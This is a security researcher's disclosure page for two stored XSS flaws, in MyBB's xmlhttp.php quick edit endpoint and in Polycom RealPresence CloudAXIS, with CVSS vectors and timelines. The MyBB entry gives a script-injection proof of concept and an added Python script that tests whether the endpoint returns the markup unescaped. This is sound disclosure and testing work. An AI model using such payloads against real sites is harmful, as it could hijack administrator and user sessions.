Adrian Hayter

Exploits

The following exploits were found by me and responsibly disclosed to all relevant parties before their public disclosure here.

MyBB Cross-site Scripting (XSS) Vulnerability (CVE-2015-4552)


A persistent Cross-site Scripting (XSS) vulnerability exists in the /xmlhttp.php file in MyBB (aka MyBulletinBoard) versions before 1.8.5 which allows remote attackers (authenticated, and in some cases unauthenticated) to inject arbitrary web script or HTML into their posts. The injected code is not rendered in the post itself, but the post's quick edit AJAX endpoint (xmlhttp.php?action=edit_post&do=get_post) returns the post content without neutralising it, so opening that URL directly in a browser window renders and executes the injected code. Since administrators and moderators can use the quick edit feature on any post, this vulnerability could be used to target administrator and moderator accounts.

CVSS v2 Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N/E:F/RL:OF/RC:C)

Proof of Concept


Create a post with the content set to:
<script>alert(1)</script>
Get the post's ID from the page HTML (it appears in numerous places) and substitute it into the following URL:
http://example.com/xmlhttp.php?action=edit_post&do=get_post&pid=ENTER_POST_ID_HERE
Open the URL in a browser window. The JavaScript should execute and create an alert box with the contents "1". This URL will work for the user who created the post, administrators, super moderators, and moderators with permission to edit posts in the forum in which the post was made. All other users will see a permissions error.
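The following check script is an added example and is not part of the original advisory or of MyBB. It builds the quick edit URL above for a given post ID, fetches it as a supplied session (the Cookie header value is passed in by the operator), and classifies the response body into three outcomes: the raw marker is present (the behaviour described above), only an entity-encoded form is present (the markup has been neutralised), or neither is present (for example the permissions error a non-privileged user receives). The marker string, the cookie handling and the Content-Type test are assumptions made for this example; the advisory itself only states that the URL executes the script in a browser.

```python
"""Added check for the MyBB xmlhttp.php quick edit response (example code,
not from the advisory or the MyBB project).

Assumptions made here: the marker payload, the opaque Cookie header value
supplied by the operator, and the use of the Content-Type header to decide
whether a browser would treat the body as HTML.
"""
import html
import sys
import urllib.parse
import urllib.request

# Marker from the advisory's PoC; any unique string containing '<' works.
MARKER = "<script>alert(1)</script>"


def quick_edit_url(base_url, pid):
    """Build the quick edit URL from the advisory for a given post ID."""
    query = urllib.parse.urlencode(
        {"action": "edit_post", "do": "get_post", "pid": pid})
    return f"{base_url.rstrip('/')}/xmlhttp.php?{query}"


def escaped_forms(payload):
    """Entity-encoded forms a neutralised response could contain instead of
    the raw markup: named entities (&lt;) and decimal numeric ones (&#60;)."""
    named = html.escape(payload)
    numeric = "".join(f"&#{ord(c)};" if c in "<>&\"'" else c for c in payload)
    return [named, numeric]


def classify(body, payload=MARKER):
    """
    'unescaped': the raw payload is in the body; a browser rendering this
                 response as HTML would execute it (the reported behaviour).
    'escaped':   only an entity-encoded form is present, so the markup is
                 shown as text rather than interpreted.
    'absent':    neither form is present, e.g. a permissions error or a
                 wrong post ID.
    """
    if payload in body:
        return "unescaped"
    if any(form in body for form in escaped_forms(payload)):
        return "escaped"
    return "absent"


def assess(content_type, body, payload=MARKER):
    """Combine the body check with the Content-Type: the script only runs
    when the browser is told to render the response as HTML."""
    verdict = classify(body, payload)
    is_html = content_type.split(";")[0].strip().lower() == "text/html"
    return {"verdict": verdict,
            "executes_in_browser": verdict == "unescaped" and is_html}


def fetch(base_url, pid, cookie):
    """Fetch the quick edit response as the session identified by `cookie`
    (the full Cookie header value; assumption: the operator supplies it)."""
    req = urllib.request.Request(quick_edit_url(base_url, pid),
                                 headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        ctype = resp.headers.get("Content-Type", "")
        return ctype, resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: check.py http://example.com POST_ID 'COOKIE_HEADER'")
    ctype, body = fetch(sys.argv[1], int(sys.argv[2]), sys.argv[3])
    print(assess(ctype, body))
```

Run it first as the account that created the post, then as an unrelated account: the first should report the raw marker, the second should report "absent" because of the permissions error. A result of "escaped", or an "unescaped" body served with a non-HTML Content-Type, indicates the endpoint no longer hands the markup to the browser for interpretation.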

Timeline


28th April 2015 - Vulnerability discovered and disclosed privately to MyBB team.
29th April 2015 - Vulnerability report accepted and bug confirmed by MyBB team.
27th May 2015 - Vulnerability fixed and released as part of MyBB 1.8.5.
15th June 2015 - Vulnerability disclosed publicly here.



Polycom RealPresence CloudAXIS Suite Cross-site Scripting (XSS) Vulnerability (CVE-2015-1516)


A persistent Cross-site Scripting (XSS) vulnerability exists in Polycom RealPresence CloudAXIS Suite versions prior to 1.7.0 which allows a remote authenticated user to inject arbitrary JavaScript or HTML into the application. Injected code is rendered and executed by a victim's web browser as soon as they join the session.

This vulnerability was found whilst working for CNS Hut3.

CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N/E:POC/RL:OF/RC:C)

Timeline


16th September 2014 - Vulnerability discovered.
20th November 2014 - Vulnerability disclosed to Polycom Security Team.
12th December 2014 - Vulnerability report accepted and bug confirmed as fixed pending testing and verification.
April 2015 - Vulnerability fixed and released as part of 1.7.0 update.
18th June 2015 - Vulnerability disclosed publicly here.